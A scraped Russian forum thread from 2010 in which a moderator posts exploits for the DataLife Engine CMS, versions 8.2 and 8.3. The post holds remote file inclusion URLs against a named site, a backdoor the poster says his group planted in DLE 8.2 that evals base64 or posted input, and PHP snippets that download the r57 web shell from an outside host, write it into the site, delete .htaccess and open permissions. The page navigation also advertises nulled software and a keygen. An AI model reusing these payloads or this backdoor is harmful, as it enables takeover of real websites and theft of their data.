WFound.Ru - Форум » Взлом DataLife Engine v 8.3 (уязвимости dle, взлом DLE 8.3)

Новости

Бизнес

Политика

Авто

Hi-Tech

Путешествия

Спорт

Наука

В Украине

Экономика

Отдых

Кафе и Рестораны

Мода и стиль

Общество

Юмор

Фильмы

Образование

История

Звезды

Гороскопы

Кулинарния

Афиша

Кино

Клубы

Концерты

События

Выставки

Тв-программа

Общение

Форум

Каталог сайтов

Блоги

Фотки

Чат

CMS

DataLife Engine

Eleanor

Joomla

Danneo

Drupal

Другие

SEO Инструменты

Панель оптимизатора

Положение сайта

Стоимость ссылки

Проверка скорости

Анализ текста

Массовая проверка

Информер тИЦ и PR

Генератор анкоров

Софт

Интернет

Веб-дизайн

Серверное ПО

Браузеры

Игры

Редакторы

Графика

Мультимедиа

Оформление

Офис

Дизайн

Клипарты

Шрифты

Иконки

Кисти

Плагины

Скрипты Photoshop

Шаблоны Photoshop

Обои

Разное

E-book

Компьютерные

Журналы

Видеоуроки

Аудиокниги

Книги

Разное

Разное

DLE KeyGen

Декодер PhpLockIt

Карта сайта

Пользователи

Прогноз погоды

Техподдержка

Правила сайта

Реклама на сайте

» WFound.Ru - CMS, сайты, новости, hi-tech, seo.

рубрикатор

		Новости
		Новости
		В Украине Hi-Tech Бизнес Политика Наука Авто Путешествия Спорт Экономика
		Отдых
		Отдых
		Кафе и Рестораны Мода и стиль Общество Юмор Фильмы Образование История Звезды Гороскопы Кулинария REPORT
		Афиша
		Афиша
		Кино Клубы Концерты События Выставки Тв-программа
		Общение
		Общение
		Форум Каталог сайтов Блоги Фотки Чат
		CMS
		CMS
		DataLife Engine Eleanor Drupal Joomla Danneo Другие
		Культура
		Культура
		Новости Выставки Кинематограф Музыка Театры
		DataLife Engine
		DataLife Engine
		Релизы Модули DLE Шаблоны DLE Хаки DLE Багфиксы DLE Сборки DLE Платное Разное
		E-book
		E-book
		Компьютерные Журналы Видеоуроки Аудиокниги Книги Разное
		Дизайн
		Дизайн
		Клипарты Шрифты Иконки Кисти Плагины Скрипты Photoshop Шаблоны Photoshop Обои Разное
		Linux
		Linux
		CentOS
		Статьи
		Статьи

		Скрипты
		Скрипты

последние комментарии

Автор: Knopkliityh в новости:
Доска объявлений JBoard Ver.3 Nulled (Без хайда)

Автор: naxyInjumma в новости:
Соболева Лариса. Фея лжи ( Аудиокнига )

Автор: olyapetrova в новости:
IPB 3.0.5 rus (Nulled + не нуленный)

Автор: brute в новости:
Каталог фирм и организаций для Dle

Автор: Perevodimm в новости:
Доска объявлений JBoard Ver.3 Nulled (Без хайда)

Автор: mydverey в новости:
Дмитрий Липскеров. Пространство Готлиба

Автор: olyapetrova в новости:
vBulletin.v 3.7.1

Автор: AlexKlimov в новости:
Доска объявлений JBoard Ver.3 Nulled (Без хайда)

Автор: danny_archer в новости:
Индонезийцы "свергли" Обаму

Автор: danny_archer в новости:
Сборная России узнала соперников по отборочному турниру ...

Ваше мнение

Новые разделы, сервисы, которые бы Вы хотели видеть на WFound портале?

немного рекламы

Карта сайта

игрушки, новостной ресурс, Новые объявления про игрушки. | . скейтборды - магазин скейтборд - www.active-life.net.ua.

Новые сообщения | Текстовая версия

Взлом DataLife Engine v 8.3 (уязвимости dle, взлом DLE 8.3)
Опции форума

ZLoY	Сообщение #1
Счастливый человек 119 Репутация: 4 Группа: Модераторы Сообщений: 742 Предупреждения:	Выкладываю несколько сплоитов для DLE 8.3: ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca lhost/c.txt? http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt ? http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L] http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local host/c.txt? http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local host/c.txt? Сплоит для DLE 8.2: http://skripters.com/engine/api/api.class.php?dle_config_api=[shell.txt?] есть ещё бекдор нашего производства, был добавлен в 8.2 версию: if($_GET['wert']==''){ require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; ; $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; @header("HTTP/1.0 200 OK"); @header("HTTP/1.1 200 OK"); @header("Cache-Control: no-cache, must-revalidate, max-age=0"); @header("Expires: 0"); @header("Pragma: no-cache"); @header("Content-type: text/css; charset=".$config['charset']); $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?versio n_id=".$_REQUEST['versionid']."&key=".$config 1;'key']); if (!strlen($data)) echo $lang['no_update']; else echo $data; }else{ $file=(ROOT_DIR."/engine/classes/mysql.class.php"); if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} $file=(ROOT_DIR."/engine/data/dbconfig.php"); if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} $file=(ROOT_DIR."/engine/data/config.php"); if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} eval(base64_decode($_GET['user_id'])); &nbs p; echo <<<HTML <HTML><body><form action="" method="post"> <center><textarea name="text" rows="10" cols="100"></textarea> <br /><input type="submit" value="Canoinoaaoe"/></center></form></body> </HTML> HTML; if($_POST['text']!=''){eval(stripcslashes 0;$_POST['text'])); }} Эти коды очень помогут для заливки шелла: Удалить файл $dir=ROOT_DIR.'/engine/cache/.htaccess'; unlink($dir); Заливаем шел с названием sh.php $file = file_get_contents('http://hack-expo.void.ru/groups/rg/rel/r57shell.t xt'); $brd = fopen('sh.php','w+'); $write = fwrite ($brd, $file); Показать дерикторию ../ $d = dir("../"); echo "Handle: ".$d->handle."<br>\\n"; echo "Path: ".$d->path."<br>\\n"; while (false !== ($entry = $d->read())) { echo $entry."<br>\\n"; } $d->close(); Просмотрт дирректории из консоли: passthru("cd ./; ls -la"); MD5 Код: $str = 'jone'; echo md5($str); Показать ROOT_DIR.\'/engine/cache\' $dir=ROOT_DIR.'/engine/cache'; $xcv=scandir($dir); ksort($xcv); for($i=0;$i<count($xcv);$i++){ $qwe=substr(sprintf('%o', fileperms($dir.'/'.$xcv[$i])), -4); if(filetype($dir.'/'.$xcv[$i])=='dir'){ $color='#FF0000'; }else{ $color='#000066'; } echo $qwe.' - <font color="'.$color.'">'.$xcv[$i].'</font 2;<br />'; } Записать $dir=ROOT_DIR.'/engine/cache/sh.php'; $file = file_get_contents('http://hack-expo.void.ru/groups/rg/rel/r57shell.t xt'); $brd = fopen($dir,'w+'); $write = fwrite ($brd, $file); chmod $dir=ROOT_DIR.'/engine/cache/.htaccess'; @chmod($dir,0777); @chmod('index.php',0777); -------------------------------------- 123кеш.., а мне уже как то насрать на мою тысячу Евро (с)
22 января 2010 23:04	ICQ: 307192 \| Зарегистрирован: 27.08.2009 \|

pspbase	Сообщение #2
WFound User 68 Репутация: 2 Группа: VIP Сообщений: 171 Предупреждения:	Ещё бы поподробнее и было б заебок! -------------------------------------- «Чернобылей больше не будет» (Онотоле) (С)
22 января 2010 23:30	ICQ: 22226662 \| Зарегистрирован: 6.11.2009 \|

DaImeR	Сообщение #3
WFound User 68 Репутация: 1 Группа: Модераторы Сообщений: 165 Предупреждения:	немного погуглить и все понятно) -------------------------------------- Господи, перезагрузи этот мир
23 января 2010 00:23	ICQ: 333777079 \| Зарегистрирован: 9.01.2010 \|

Like-Angel	Сообщение #4
WFound Детский Сад 17 Репутация: 0 Группа: Пользователи Сообщений: 1 Предупреждения:	блин плз помогите вот у меня с верху 2 последнии строчки пишит что Невозможно загрузить шаблон: info.tpl что мне дальше делать помогите плз прошу пожалуйста !
5 января 2011 02:22	ICQ: -- \| Зарегистрирован: 5.01.2011 \|

« · Хакинг и безопасность · »

1 чел. читают эту тему (гостей: 1)

Пользователей: 0

теги

DLE, linux, quot, Wallpaper, АВТО, будет, видео, видео уроки, видеокурс, интернет, картинки, компьютер, модуль, может, Наука, новости, новый, обои, обои для рабочего стола, Образование, обучающее видео, Общество, программа, программы, Происшествия, Разное, России, сети, скачать, скачать картинки, скачать обои, скачать софт, Софт, Спорт, Ученые, шаблон, шаблона, Экономика, Юмор

Показать все теги

топ новостей

» Дмитрий Липскеров. Пространство Готлиба
» Соболева Лариса. Фея лжи ( Аудиокнига )
» Ольга Громыко. Профессия ведьма. Часть 2 ( Аудиокнига)
» Амброз Бирс. Глаза пантеры ( Аудиокнига )
» Владимир Бушин - Это они, Господи
» Коттон Джерри. Плейбой и его убийца ( Аудиокнига )
» Microsoft Office Pro Plus 2010 SP1 VL + Project Pro 201 ...
» Microsoft Office 2010 Professional Plus / Visio Premium ...
» Comedy Баттл. Турнир [02х17] (2012) SATRip
» Autodesk Mudbox 2012 SP2 (x86/x64/ENG)

архивы

Февраль 2012 (8)
Январь 2012 (8)
Декабрь 2011 (66)
Ноябрь 2011 (4)
Октябрь 2011 (9)
Сентябрь 2011 (6)

Показать весь архив

календарь

Новости

Чат WFound.ru
Чат снова в строю _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____

Читать | 19 января 2011 21:39

Пиратские сервы Lineage2
Виртуальное преступление и реальное наказание

Читать | 15 мая 2010 21:27

Приветствия пользователей на WFound
Наши многоуважаемые посетители! Посоветовавшись, мы решили организовать на сайте прикольные и интересные приветствия для наших любимых пользователей...

Читать | 11 мая 2010 20:05

За езду на игрушечном автомобиле в нетрезвом состо ...
За езду в состоянии алкогольного опьянения на детском игрушечном автомобиле для куклы Барби суд Великобритании приговорил 40-летнего жителя графства Эссекс Пола Хаттона (Paul Hutton) к лишению водительского удостоверения сроком на три года условно. ...

Читать | 11 мая 2010 14:30

WFound | Почта
С 10.05.2010 открыта WFound Почта. Протцесс получения ящика пока не автоматизирован. Для желающих получить адрес - отписывайтесь в комментариях, или в icq к ZLoY. Доступные домены: Показать / Скрыть текст@wfound.ru @wfound.net @sv-news.ru

Читать | 10 мая 2010 09:52